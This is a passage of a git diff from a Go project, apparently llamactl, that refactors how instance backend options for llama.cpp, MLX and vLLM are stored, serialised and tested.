*opts.RestartDelay != 15 { - t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay) + if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 { + t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts) } } @@ -155,10 +124,12 @@ func TestSetOptions(t *testing.T) { } initialOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -169,18 +140,20 @@ func TestSetOptions(t *testing.T) { // Update options newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", - Port: 8081, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, }, } inst.SetOptions(newOptions) opts := inst.GetOptions() - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } if inst.GetPort() != 8081 { t.Errorf("Expected updated port 8081, got %d", inst.GetPort()) @@ -192,58 +165,6 @@ func TestSetOptions(t *testing.T) { } } -func TestSetOptions_PreservesNodes(t *testing.T) { - backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - } - - globalSettings := &config.InstancesConfig{ - LogsDir: "/tmp/test", - DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - - // Create instance with initial nodes - initialOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"worker1": {}}, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, - }, - } - - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} - inst := instance.New("test-instance", backendConfig, globalSettings, initialOptions, "main", mockOnStatusChange) - - // Try to update with different nodes - updatedOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", - Port: 8081, - }, - } - - inst.SetOptions(updatedOptions) - opts := inst.GetOptions() - - // Nodes should remain unchanged - if _, exists := opts.Nodes["worker1"]; len(opts.Nodes) != 1 || !exists { - t.Errorf("Expected nodes to contain 'worker1', got %v", opts.Nodes) - } - - // Other options should be updated - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) - } -} - func TestGetProxy(t *testing.T) { backendConfig := &config.BackendConfig{ LlamaCpp: config.BackendSettings{ @@ -265,10 +186,13 @@ func TestGetProxy(t *testing.T) { } options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8080, + Nodes: map[string]struct{}{"main": {}}, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Host: "localhost", + Port: 8080, + }, }, } @@ -298,49 +222,29 @@ func TestGetProxy(t *testing.T) { func TestMarshalJSON(t *testing.T) { backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{ - Command: "llama-server", - Args: []string{}, - }, - MLX: config.BackendSettings{ - Command: "mlx_lm.server", - Args: []string{}, - }, - VLLM: config.BackendSettings{ - Command: "vllm", - Args: []string{"serve"}, - }, + LlamaCpp: config.BackendSettings{Command: "llama-server"}, } - - globalSettings := &config.InstancesConfig{ - LogsDir: "/tmp/test", - DefaultAutoRestart: true, - DefaultMaxRestarts: 3, - DefaultRestartDelay: 5, - } - + globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } - // Mock onStatusChange function - mockOnStatusChange := func(oldStatus, newStatus instance.Status) {} + inst := instance.New("test-instance", backendConfig, globalSettings, options, "main", nil) - instance := instance.New("test-instance", backendConfig, globalSettings, options, "main", mockOnStatusChange) - - data, err := json.Marshal(instance) + data, err := json.Marshal(inst) if err != nil { t.Fatalf("JSON marshal failed: %v", err) } - // Check that JSON contains expected fields + // Verify by unmarshaling and checking key fields var result map[string]any - err = json.Unmarshal(data, &result) - if err != nil { + if err := json.Unmarshal(data, &result); err != nil { t.Fatalf("JSON unmarshal failed: %v", err) } @@ -350,37 +254,9 @@ func TestMarshalJSON(t *testing.T) { if result["status"] != "stopped" { t.Errorf("Expected status 'stopped', got %v", result["status"]) } - - // Check that options are included - options_data, ok := result["options"] - if !ok { + if result["options"] == nil { t.Error("Expected options to be included in JSON") } - options_map, ok := options_data.(map[string]interface{}) - if !ok { - t.Error("Expected options to be a map") - } - - // Check backend type - if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) { - t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"]) - } - - // Check backend options - backend_options_data, ok := options_map["backend_options"] - if !ok { - t.Error("Expected backend_options to be included in JSON") - } - backend_options_map, ok := backend_options_data.(map[string]any) - if !ok { - t.Error("Expected backend_options to be a map") - } - if backend_options_map["model"] != "/path/to/model.gguf" { - t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"]) - } - if backend_options_map["port"] != float64(8080) { - t.Errorf("Expected port 8080, got %v", backend_options_map["port"]) - } } func TestUnmarshalJSON(t *testing.T) { @@ -415,14 +291,14 @@ func TestUnmarshalJSON(t *testing.T) { if opts == nil { t.Fatal("Expected options to be set") } - if opts.BackendType != backends.BackendTypeLlamaCpp { - t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType) + if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp { + t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType) } - if opts.LlamaServerOptions == nil { + if opts.BackendOptions.LlamaServerOptions == nil { t.Fatal("Expected LlamaServerOptions to be set") } - if opts.LlamaServerOptions.Model != "/path/to/model.gguf" { - t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } if inst.GetPort() != 8080 { t.Errorf("Expected port 8080, got %d", inst.GetPort()) @@ -490,9 +366,11 @@ func TestCreateOptionsValidation(t *testing.T) { options := &instance.Options{ MaxRestarts: tt.maxRestarts, RestartDelay: tt.restartDelay, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -523,9 +401,11 @@ func TestStatusChangeCallback(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -588,10 +468,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: tt.initialNodes, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + Nodes: tt.initialNodes, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -599,10 +481,12 @@ func TestSetOptions_NodesPreserved(t *testing.T) { // Attempt to update nodes (should be ignored) updateOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: tt.updateNodes, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/new-model.gguf", + Nodes: tt.updateNodes, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + }, }, } inst.SetOptions(updateOptions) @@ -620,8 +504,8 @@ func TestSetOptions_NodesPreserved(t *testing.T) { } // Verify other options were updated - if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model) + if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model) } }) } @@ -633,9 +517,11 @@ func TestProcessErrorCases(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -663,10 +549,12 @@ func TestRemoteInstanceOperations(t *testing.T) { } globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -702,49 +590,6 @@ func TestRemoteInstanceOperations(t *testing.T) { } } -func TestProxyClearOnOptionsChange(t *testing.T) { - backendConfig := &config.BackendConfig{ - LlamaCpp: config.BackendSettings{Command: "llama-server"}, - } - globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"} - options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8080, - }, - } - - inst := instance.New("test", backendConfig, globalSettings, options, "main", nil) - - // Get initial proxy - proxy1, err := inst.GetProxy() - if err != nil { - t.Fatalf("Failed to get initial proxy: %v", err) - } - - // Update options (should clear proxy) - newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Host: "localhost", - Port: 8081, // Different port - }, - } - inst.SetOptions(newOptions) - - // Get proxy again - should be recreated with new port - proxy2, err := inst.GetProxy() - if err != nil { - t.Fatalf("Failed to get proxy after options change: %v", err) - } - - // Proxies should be different instances (recreated) - if proxy1 == proxy2 { - t.Error("Expected proxy to be recreated after options change") - } -} - func TestIdleTimeout(t *testing.T) { backendConfig := &config.BackendConfig{ LlamaCpp: config.BackendSettings{Command: "llama-server"}, @@ -754,10 +599,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("not running never times out", func(t *testing.T) { timeout := 1 inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: &timeout, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) @@ -768,10 +615,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("no timeout configured", func(t *testing.T) { inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: nil, // No timeout - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) inst.SetStatus(instance.Running) @@ -784,10 +633,12 @@ func TestIdleTimeout(t *testing.T) { t.Run("timeout exceeded", func(t *testing.T) { timeout := 1 // 1 minute inst := instance.New("test", backendConfig, globalSettings, &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, IdleTimeout: &timeout, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, }, "main", nil) inst.SetStatus(instance.Running) diff --git a/pkg/instance/options.go b/pkg/instance/options.go index 1dddb15..0c4b582 100644 --- a/pkg/instance/options.go +++ b/pkg/instance/options.go @@ -4,12 +4,8 @@ import ( "encoding/json" "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/backends/mlx" - "llamactl/pkg/backends/vllm" "llamactl/pkg/config" "log" - "maps" "slices" "sync" ) @@ -24,18 +20,12 @@ type Options struct { OnDemandStart *bool `json:"on_demand_start,omitempty"` // Idle timeout IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes - //Environment variables + // Environment variables Environment map[string]string `json:"environment,omitempty"` - - BackendType backends.BackendType `json:"backend_type"` - BackendOptions map[string]any `json:"backend_options,omitempty"` - + // Assigned nodes Nodes map[string]struct{} `json:"-"` - - // Backend-specific options - LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"` - MlxServerOptions *mlx.MlxServerOptions `json:"-"` - VllmServerOptions *vllm.VllmServerOptions `json:"-"` + // Backend options + BackendOptions backends.Options `json:"-"` } // options wraps Options with thread-safe access (unexported). @@ -65,6 +55,18 @@ func (o *options) set(opts *Options) { o.opts = opts } +func (o *options) GetHost() string { + o.mu.RLock() + defer o.mu.RUnlock() + return o.opts.BackendOptions.GetHost() +} + +func (o *options) GetPort() int { + o.mu.RLock() + defer o.mu.RUnlock() + return o.opts.BackendOptions.GetPort() +} + // MarshalJSON implements json.Marshaler for options wrapper func (o *options) MarshalJSON() ([]byte, error) { o.mu.RLock() @@ -88,7 +90,9 @@ func (c *Options) UnmarshalJSON(data []byte) error { // Use anonymous struct to avoid recursion type Alias Options aux := &struct { - Nodes []string `json:"nodes,omitempty"` // Accept JSON array + Nodes []string `json:"nodes,omitempty"` + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` *Alias }{ Alias: (*Alias)(c), @@ -106,47 +110,27 @@ func (c *Options) UnmarshalJSON(data []byte) error { } } - // Parse backend-specific options - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.BackendOptions != nil { - // Convert map to JSON and then unmarshal to LlamaServerOptions - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } + // Create backend options struct and unmarshal + c.BackendOptions = backends.Options{ + BackendType: aux.BackendType, + BackendOptions: aux.BackendOptions, + } - c.LlamaServerOptions = &llamacpp.LlamaServerOptions{} - if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err) - } - } - case backends.BackendTypeMlxLm: - if c.BackendOptions != nil { - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } + // Marshal the backend options to JSON for proper unmarshaling + backendJson, err := json.Marshal(struct { + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` + }{ + BackendType: aux.BackendType, + BackendOptions: aux.BackendOptions, + }) + if err != nil { + return fmt.Errorf("failed to marshal backend options: %w", err) + } - c.MlxServerOptions = &mlx.MlxServerOptions{} - if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal MLX options: %w", err) - } - } - case backends.BackendTypeVllm: - if c.BackendOptions != nil { - optionsData, err := json.Marshal(c.BackendOptions) - if err != nil { - return fmt.Errorf("failed to marshal backend options: %w", err) - } - - c.VllmServerOptions = &vllm.VllmServerOptions{} - if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil { - return fmt.Errorf("failed to unmarshal vLLM options: %w", err) - } - } - default: - return fmt.Errorf("unknown backend type: %s", c.BackendType) + // Unmarshal into the backends.Options struct to trigger its custom unmarshaling + if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil { + return fmt.Errorf("failed to unmarshal backend options: %w", err) } return nil @@ -157,7 +141,9 @@ func (c *Options) MarshalJSON() ([]byte, error) { // Use anonymous struct to avoid recursion type Alias Options aux := struct { - Nodes []string `json:"nodes,omitempty"` // Output as JSON array + Nodes []string `json:"nodes,omitempty"` // Output as JSON array + BackendType backends.BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` *Alias }{ Alias: (*Alias)(c), @@ -173,52 +159,26 @@ func (c *Options) MarshalJSON() ([]byte, error) { slices.Sort(aux.Nodes) } - // Convert backend-specific options back to BackendOptions map for JSON - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - data, err := json.Marshal(c.LlamaServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal llama server options: %w", err) - } + // Set backend type + aux.BackendType = c.BackendOptions.BackendType - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } - case backends.BackendTypeMlxLm: - if c.MlxServerOptions != nil { - data, err := json.Marshal(c.MlxServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal MLX server options: %w", err) - } - - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - data, err := json.Marshal(c.VllmServerOptions) - if err != nil { - return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err) - } - - var backendOpts map[string]any - if err := json.Unmarshal(data, &backendOpts); err != nil { - return nil, fmt.Errorf("failed to unmarshal to map: %w", err) - } - - aux.BackendOptions = backendOpts - } + // Marshal the backends.Options struct to get the properly formatted backend options + // Marshal a pointer to trigger the pointer receiver MarshalJSON method + backendData, err := json.Marshal(&c.BackendOptions) + if err != nil { + return nil, fmt.Errorf("failed to marshal backend options: %w", err) } + // Unmarshal into a temporary struct to extract the backend_options map + var tempBackend struct { + BackendOptions map[string]any `json:"backend_options,omitempty"` + } + if err := json.Unmarshal(backendData, &tempBackend); err != nil { + return nil, fmt.Errorf("failed to unmarshal backend data: %w", err) + } + + aux.BackendOptions = tempBackend.BackendOptions + return json.Marshal(aux) } @@ -260,78 +220,3 @@ func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.I } } } - -// getCommand builds the command to run the backend -func (c *Options) getCommand(backendConfig *config.BackendSettings) string { - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - return "docker" - } - - return backendConfig.Command -} - -// buildCommandArgs builds command line arguments for the backend -func (c *Options) buildCommandArgs(backendConfig *config.BackendSettings) []string { - - var args []string - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - // For Docker, start with Docker args - args = append(args, backendConfig.Docker.Args...) - args = append(args, backendConfig.Docker.Image) - - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - args = append(args, c.LlamaServerOptions.BuildDockerArgs()...) - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - args = append(args, c.VllmServerOptions.BuildDockerArgs()...) - } - } - - } else { - // For native execution, start with backend args - args = append(args, backendConfig.Args...) - - switch c.BackendType { - case backends.BackendTypeLlamaCpp: - if c.LlamaServerOptions != nil { - args = append(args, c.LlamaServerOptions.BuildCommandArgs()...) - } - case backends.BackendTypeMlxLm: - if c.MlxServerOptions != nil { - args = append(args, c.MlxServerOptions.BuildCommandArgs()...) - } - case backends.BackendTypeVllm: - if c.VllmServerOptions != nil { - args = append(args, c.VllmServerOptions.BuildCommandArgs()...) - } - } - } - - return args -} - -// buildEnvironment builds the environment variables for the backend process -func (c *Options) buildEnvironment(backendConfig *config.BackendSettings) map[string]string { - env := map[string]string{} - - if backendConfig.Environment != nil { - maps.Copy(env, backendConfig.Environment) - } - - if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm { - if backendConfig.Docker.Environment != nil { - maps.Copy(env, backendConfig.Docker.Environment) - } - } - - if c.Environment != nil { - maps.Copy(env, c.Environment) - } - - return env -} diff --git a/pkg/instance/process.go b/pkg/instance/process.go index 9c7cfec..3429e61 100644 --- a/pkg/instance/process.go +++ b/pkg/instance/process.go @@ -12,9 +12,6 @@ import ( "sync" "syscall" "time" - - "llamactl/pkg/backends" - "llamactl/pkg/config" ) // process manages the OS process lifecycle for a local instance. @@ -216,7 +213,8 @@ func (p *process) waitForHealthy(timeout int) error { defer cancel() // Get host/port from instance - host, port := p.instance.getBackendHostPort() + host := p.instance.options.GetHost() + port := p.instance.options.GetPort() healthURL := fmt.Sprintf("http://%s:%d/health", host, port) // Create a dedicated HTTP client for health checks @@ -386,26 +384,15 @@ func (p *process) handleAutoRestart(err error) { // buildCommand builds the command to execute using backend-specific logic func (p *process) buildCommand() (*exec.Cmd, error) { - // Get options - opts := p.instance.GetOptions() - if opts == nil { - return nil, fmt.Errorf("instance options are nil") - } - - // Get backend configuration - backendConfig, err := p.getBackendConfig() - if err != nil { - return nil, err - } // Build the environment variables - env := opts.buildEnvironment(backendConfig) + env := p.instance.buildEnvironment() // Get the command to execute - command := opts.getCommand(backendConfig) + command := p.instance.getCommand() // Build command arguments - args := opts.buildCommandArgs(backendConfig) + args := p.instance.buildCommandArgs() // Create the exec.Cmd cmd := exec.CommandContext(p.ctx, command, args...) @@ -420,27 +407,3 @@ func (p *process) buildCommand() (*exec.Cmd, error) { return cmd, nil } - -// getBackendConfig resolves the backend configuration for the current instance -func (p *process) getBackendConfig() (*config.BackendSettings, error) { - opts := p.instance.GetOptions() - if opts == nil { - return nil, fmt.Errorf("instance options are nil") - } - - var backendTypeStr string - - switch opts.BackendType { - case backends.BackendTypeLlamaCpp: - backendTypeStr = "llama-cpp" - case backends.BackendTypeMlxLm: - backendTypeStr = "mlx" - case backends.BackendTypeVllm: - backendTypeStr = "vllm" - default: - return nil, fmt.Errorf("unsupported backend type: %s", opts.BackendType) - } - - settings := p.instance.globalBackendSettings.GetBackendSettings(backendTypeStr) - return &settings, nil -} diff --git a/pkg/instance/proxy.go b/pkg/instance/proxy.go index 321095b..a429889 100644 --- a/pkg/instance/proxy.go +++ b/pkg/instance/proxy.go @@ -2,7 +2,6 @@ package instance import ( "fmt" - "llamactl/pkg/backends" "net/http" "net/http/httputil" "net/url" @@ -63,13 +62,16 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) { } // Remote instances should not use local proxy - they are handled by RemoteInstanceProxy - if len(options.Nodes) > 0 { + if _, isLocal := options.Nodes[p.instance.localNodeName]; !isLocal { return nil, fmt.Errorf("instance %s is a remote instance and should not use local proxy", p.instance.Name) } // Get host/port from process - host, port := p.instance.getBackendHostPort() - + host := p.instance.options.GetHost() + port := p.instance.options.GetPort() + if port == 0 { + return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name) + } targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port)) if err != nil { return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, err) @@ -78,15 +80,7 @@ func (p *proxy) build() (*httputil.ReverseProxy, error) { proxy := httputil.NewSingleHostReverseProxy(targetURL) // Get response headers from backend config - var responseHeaders map[string]string - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - responseHeaders = p.instance.globalBackendSettings.LlamaCpp.ResponseHeaders - case backends.BackendTypeVllm: - responseHeaders = p.instance.globalBackendSettings.VLLM.ResponseHeaders - case backends.BackendTypeMlxLm: - responseHeaders = p.instance.globalBackendSettings.MLX.ResponseHeaders - } + responseHeaders := options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings) proxy.ModifyResponse = func(resp *http.Response) error { // Remove CORS headers from backend response to avoid conflicts diff --git a/pkg/manager/manager_test.go b/pkg/manager/manager_test.go index 531e9e2..8c1be1c 100644 --- a/pkg/manager/manager_test.go +++ b/pkg/manager/manager_test.go @@ -3,7 +3,6 @@ package manager_test import ( "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -71,10 +70,12 @@ func TestPersistence(t *testing.T) { // Test instance persistence on creation manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main") options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -133,9 +134,11 @@ func TestConcurrentAccess(t *testing.T) { go func(index int) { defer wg.Done() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } instanceName := fmt.Sprintf("concurrent-test-%d", index) @@ -170,9 +173,11 @@ func TestShutdown(t *testing.T) { // Create test instance options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } _, err := mgr.CreateInstance("test-instance", options) @@ -231,11 +236,13 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) { autoRestart := false options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, AutoRestart: &autoRestart, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } diff --git a/pkg/manager/operations.go b/pkg/manager/operations.go index 7129794..fd150e8 100644 --- a/pkg/manager/operations.go +++ b/pkg/manager/operations.go @@ -2,7 +2,6 @@ package manager import ( "fmt" - "llamactl/pkg/backends" "llamactl/pkg/instance" "llamactl/pkg/validation" "os" @@ -86,7 +85,7 @@ func (im *instanceManager) CreateInstance(name string, options *instance.Options return nil, err } - err = validation.ValidateInstanceOptions(options) + err = options.BackendOptions.ValidateInstanceOptions() if err != nil { return nil, err } @@ -232,7 +231,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.Options return nil, fmt.Errorf("instance options cannot be nil") } - err := validation.ValidateInstanceOptions(options) + err := options.BackendOptions.ValidateInstanceOptions() if err != nil { return nil, err } @@ -493,39 +492,12 @@ func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, e // getPortFromOptions extracts the port from backend-specific options func (im *instanceManager) getPortFromOptions(options *instance.Options) int { - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - if options.LlamaServerOptions != nil { - return options.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if options.MlxServerOptions != nil { - return options.MlxServerOptions.Port - } - case backends.BackendTypeVllm: - if options.VllmServerOptions != nil { - return options.VllmServerOptions.Port - } - } - return 0 + return options.BackendOptions.GetPort() } // setPortInOptions sets the port in backend-specific options func (im *instanceManager) setPortInOptions(options *instance.Options, port int) { - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - if options.LlamaServerOptions != nil { - options.LlamaServerOptions.Port = port - } - case backends.BackendTypeMlxLm: - if options.MlxServerOptions != nil { - options.MlxServerOptions.Port = port - } - case backends.BackendTypeVllm: - if options.VllmServerOptions != nil { - options.VllmServerOptions.Port = port - } - } + options.BackendOptions.SetPort(port) } // assignAndValidatePort assigns a port if not specified and validates it's not in use diff --git a/pkg/manager/operations_test.go b/pkg/manager/operations_test.go index 